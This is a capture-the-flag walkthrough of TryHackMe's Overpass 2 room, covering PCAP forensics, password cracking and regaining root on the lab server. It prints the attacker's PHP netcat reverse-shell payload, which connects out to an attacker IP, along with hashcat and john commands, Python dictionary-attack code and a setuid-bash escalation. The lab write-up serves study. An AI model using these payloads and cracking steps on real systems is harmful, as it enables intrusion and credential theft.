CTF Writeups

Tryhackme: Overpass 2 Walkthrough

PCAP analysis & some easy hacking!

WSGSec

--

Quick walkthrough of Tryhackme's Overpass 2 room. This room is part of the 'Offensive Pentesting' path, which I'm doing as part of my OSCP study.

Background

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.
Can you work out how the attacker got in, and hack your way back into Overpass’ production server?
Note: Although this room is a walk-through, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Linux Fundamentals as a bare minimum.
md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc

Forensics — Analyse the PCAP

What was the URL of the page they used to upload a reverse shell?

When you open the PCAP, it is the first HTTP request in the capture (the http.request display filter lists them). Follow TCP Stream works too but is not needed for this question:

Answer: /development

What payload did the attacker use to gain access?

Following the HTTP stream for that request leads to a mention of a vulnerable upload page as well as to upload.php:

Following the tcp stream here will lead us to finding our uploaded payload:

Answer: <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

This is the classic named-pipe reverse shell: the FIFO /tmp/f feeds whatever netcat receives into an interactive /bin/sh, and the shell's output (stderr merged into stdout) is piped back into nc, which connects out to the attacker at 192.168.170.145:4242. Nothing is encrypted, which is what makes the rest of the session readable in the capture.

What password did the Attacker use to escalate privileges ?

Back in the PCAP, filter on the port the payload calls back to (tcp.port == 4242); Wireshark's default colouring rules also make these packets stand out in black and red. Following the TCP stream on one of them shows every command the attacker typed, in plaintext, because the payload used plain netcat with no encryption:

How did the attacker establish persistence?

If we check further down the stream from the previous question, we will see various commands the attacker ran on the server, one of them being a git clone of a tool from GitHub:

Answer: https://github.com/NinjaJc01/ssh-backdoor

Using the fasttrack wordlist, how many of the system passwords were crackable?

The attacker's session in that same stream also exposes the contents of /etc/shadow, so the hashes can be copied from there into a text file and cracked. The question names the fasttrack wordlist (on Kali, /usr/share/wordlists/fasttrack.txt); the run below used rockyou, and four of the five loaded hashes fall either way. I used John the Ripper:


john -w=rockyou.txt passwds.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)
[REDACTED] (?)
[REDACTED] (?)
[REDACTED] (?)

Answer: 4
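Why john reports "Loaded 5 password hashes" when /etc/shadow typically has far more lines than that: accounts whose password field is * or ! carry no hash, and john skips them. The Python below is an added example, not from the writeup: it parses shadow lines, classifies each password field (crackable hash, locked, or empty), reads the crypt ID and the rounds count that john reports as "Cost 1", and emits the user:hash lines a cracker would actually load. The shadow excerpt is constructed, with placeholder hash bodies rather than real hashes.

```python
# Constructed /etc/shadow excerpt. Hash bodies are shortened placeholders, not real
# hashes; the point is the field layout and the password-field conventions.
SAMPLE_SHADOW = """\
root:$6$hKqNt8ac$Yw6Z9kPl0cEh0lDeRrO0t:18456:0:99999:7:::
daemon:*:17785:0:99999:7:::
sync:*:17785:0:99999:7:::
alice:$6$rounds=10000$7GS5e.yv$PlAcEh0lDeRaLiCe:18465:0:99999:7:::
bob:!$6$9bQk7Xcv$PlAcEh0lDeRb0b:18465:0:99999:7:::
svc:!!:18465:0:99999:7:::
carol::18465:0:99999:7:::
dave:$y$j9T$SaLt.Yescrypt$PlAcEh0lDeRdAvE:19000:0:99999:7:::
"""

# crypt(3) scheme identifiers as they appear between the first two '$'
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}


def classify(pw_field: str) -> tuple:
    """
    Return (status, algorithm, hash_or_None, rounds) for one shadow password field.
    status: 'hash' (something to feed a cracker), 'locked' (no usable hash),
    'empty' (no password at all, which is a finding in its own right).
    """
    if pw_field == "":
        return ("empty", None, None, None)
    # A leading '!' marks the account locked; '!$6$...' still carries a crackable hash.
    unlocked = pw_field.lstrip("!")
    if unlocked in ("", "*", "*LK*", "*NP*"):
        return ("locked", None, None, None)
    if not unlocked.startswith("$"):
        return ("hash", "descrypt", unlocked, None)   # legacy 13-character DES crypt
    parts = unlocked.split("$")                        # '', id, [rounds=N,] salt, hash
    algo = CRYPT_IDS.get(parts[1], "unknown")
    rounds = None
    if algo in ("sha256crypt", "sha512crypt"):
        rounds = 5000                                  # glibc default without a rounds= prefix
        if parts[2].startswith("rounds="):
            rounds = int(parts[2][len("rounds="):])
    return ("hash", algo, unlocked, rounds)


def parse_shadow(text: str) -> list:
    """Parse shadow lines into dicts; skips comments, blanks and malformed lines."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:                           # shadow(5) has exactly nine fields
            continue
        status, algo, hsh, rounds = classify(fields[1])
        rows.append({"user": fields[0], "status": status, "algo": algo,
                     "hash": hsh, "rounds": rounds})
    return rows


def john_input(text: str) -> list:
    """'user:hash' lines with a real hash, i.e. what john's 'Loaded N' count reflects."""
    return [f"{r['user']}:{r['hash']}" for r in parse_shadow(text) if r["status"] == "hash"]


if __name__ == "__main__":
    for row in parse_shadow(SAMPLE_SHADOW):
        print(row)
    print("\n".join(john_input(SAMPLE_SHADOW)))
```

The rounds value is why sha512crypt cracking is slow compared with the backdoor's plain SHA-512 later on: each guess costs 5000 iterations by default, and an administrator can raise it per account with rounds=, as the constructed alice entry shows.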

Research — Analyse the code

Here we need to analyse the code of the ssh-backdoor tool on GitHub that the attacker used for persistence:

What’s the default hash for the backdoor?

We can find this being set as a variable in the code of the main golang file:

What’s the hardcoded salt for the backdoor?

The VerifyPass function takes the salt as a parameter rather than generating one, which suggests it is hard-coded somewhere in the file:

Checking the other occurrences of the function, where it is called, gives the answer:

What was the hash that the attacker used? — go back to the PCAP for this!

Back in the TCP stream of the attacker's netcat session: the attacker passes the hash as a command-line argument when starting the backdoor, so the value can be read directly from the captured command.

Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

Put the hash and the hard-coded salt into a file as a single hash:salt line and run hashcat in the salted SHA-512 mode that matches the backdoor's scheme, SHA-512 over the password followed by the salt, which is -m 1710 (sha512($pass.$salt)):

hashcat -m 1710 backdoor.hash rockyou.txt

Plain -m 1700 (unsalted SHA-512) will never match, and -m 1720 is the salt-first variant, so if 1710 returns nothing, check the order of concatenation in the Go code before concluding that the password is not in rockyou.
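To make concrete why hash:salt with -m 1710 is the right pairing, here is a Python re-implementation of the scheme the writeup describes for the backdoor (SHA-512 over password followed by salt, hex encoded) together with a dictionary attack against it. This is an added example, not the project's Go code; the salt, target password and wordlist are constructed for the example, and the real values from the room are not reproduced. crack_either_order also tries the salt-first layout, which is how you would tell -m 1710 from -m 1720 if the Go source were not to hand.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

# Constructed values for the example; the backdoor's real salt and hash are not used here.
EXAMPLE_SALT = "8f1c2a9e0d4b7e6f3a5c1d2b9e8f7a6c"
EXAMPLE_WORDLIST = ["password", "letmein", "123456", "overpass2020", "november", "shibe"]


def hash_password(password: str, salt: str) -> str:
    """hex(SHA-512(password || salt)): the layout hashcat calls sha512($pass.$salt), -m 1710."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def hash_salt_first(password: str, salt: str) -> str:
    """hex(SHA-512(salt || password)): the -m 1720 layout, kept separate for the mode check."""
    return hashlib.sha512((salt + password).encode()).hexdigest()


def verify_pass(hash_hex: str, salt: str, password: str) -> bool:
    """Same check the backdoor performs; compare_digest avoids a timing side channel."""
    return hmac.compare_digest(hash_password(password, salt), hash_hex.lower())


def hashcat_line(hash_hex: str, salt: str) -> str:
    """One line of the hash file for: hashcat -m 1710 backdoor.hash rockyou.txt"""
    return f"{hash_hex}:{salt}"


def crack(hash_hex: str, salt: str, wordlist: Iterable[str]) -> Optional[str]:
    """
    Dictionary attack: one SHA-512 per candidate. A fixed salt and a single fast
    hash round make this orders of magnitude cheaper than sha512crypt's 5000 rounds.
    """
    for word in wordlist:
        if verify_pass(hash_hex, salt, word):
            return word
    return None


def crack_either_order(hash_hex: str, salt: str,
                       wordlist: Iterable[str]) -> Tuple[Optional[str], Optional[int]]:
    """Try both salt positions and report which hashcat mode (1710 or 1720) matched."""
    for word in wordlist:
        if hash_password(word, salt) == hash_hex:
            return word, 1710
        if hash_salt_first(word, salt) == hash_hex:
            return word, 1720
    return None, None


if __name__ == "__main__":
    target = hash_password("overpass2020", EXAMPLE_SALT)     # stands in for the captured hash
    print(hashcat_line(target, EXAMPLE_SALT))
    print(crack(target, EXAMPLE_SALT, EXAMPLE_WORDLIST))
    print(crack_either_order(hash_salt_first("shibe", EXAMPLE_SALT), EXAMPLE_SALT, EXAMPLE_WORDLIST))
```

The defensive lesson is the same one sha512crypt's rounds teach: a single SHA-512 with a static salt is a fast hash, so anything in a common wordlist falls in seconds; a password store should use a slow, per-user-salted construction instead.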

Attack — Get back in!

Now that the incident is investigated, Paradox needs someone to take control of the Overpass production server again.

The attacker defaced the website. What message did they leave as a heading?

Visit the IP of the server you just spun up to find the answer.

Answer: H4ck3d by CooctusClan

What’s the user flag?

We can now SSH in as james using the password cracked from the backdoor hash. The backdoor does not listen on the standard port 22; the port it was started on is in the same TCP stream as the attacker's commands. The host key warning is expected: the backdoor serves its own key (the id_rsa shipped in the cloned repository), not the system's SSH host key.

root@ip-10-10-96-202:~# ssh james@10.10.36.147 -p 2222
The authenticity of host '[10.10.36.147]:2222 ([10.10.36.147]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.10.36.147]:2222' (RSA) to the list of known hosts.
james@10.10.36.147's password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
james@overpass-production:/home/james/ssh-backdoor$ ls
README.md backdoor.service cooctus.png id_rsa.pub main.go
backdoor build.sh id_rsa index.html setup.sh
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls
ssh-backdoor user.txt www
james@overpass-production:/home/james$ cat user.txt

What’s the root flag?

From here we could enumerate manually (find / -perm -4000 -type f 2>/dev/null lists every setuid file) or run a tool such as linPEAS. In this case the route to root is a hidden setuid-root copy of bash in james's home directory, which a plain ls does not show because the name starts with a dot. The -p flag matters: without it, bash sees that the effective UID differs from the real UID and drops the privileges, so ./.suid_bash -p is what keeps euid 0:

james@overpass-production:/home/james$ ls -la
total 1136
drwxr-xr-x 7 james james 4096 Jul 22 2020 .
drwxr-xr-x 7 root root 4096 Jul 21 2020 ..
lrwxrwxrwx 1 james james 9 Jul 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
drwx------ 2 james james 4096 Jul 21 2020 .cache
drwx------ 3 james james 4096 Jul 21 2020 .gnupg
drwxrwxr-x 3 james james 4096 Jul 22 2020 .local
-rw------- 1 james james 51 Jul 21 2020 .overpass
-rw-r--r-- 1 james james 807 Apr 4 2018 .profile
-rw-r--r-- 1 james james 0 Jul 21 2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root root 1113504 Jul 22 2020 .suid_bash
drwxrwxr-x 3 james james 4096 Jul 22 2020 ssh-backdoor
-rw-rw-r-- 1 james james 38 Jul 22 2020 user.txt
drwxrwxr-x 7 james james 4096 Jul 21 2020 www
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# cd /root/ot
.suid_bash: cd: /root/ot: No such file or directory
.suid_bash-4.4# cd /root/
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txt

We have now pwned the machine :]
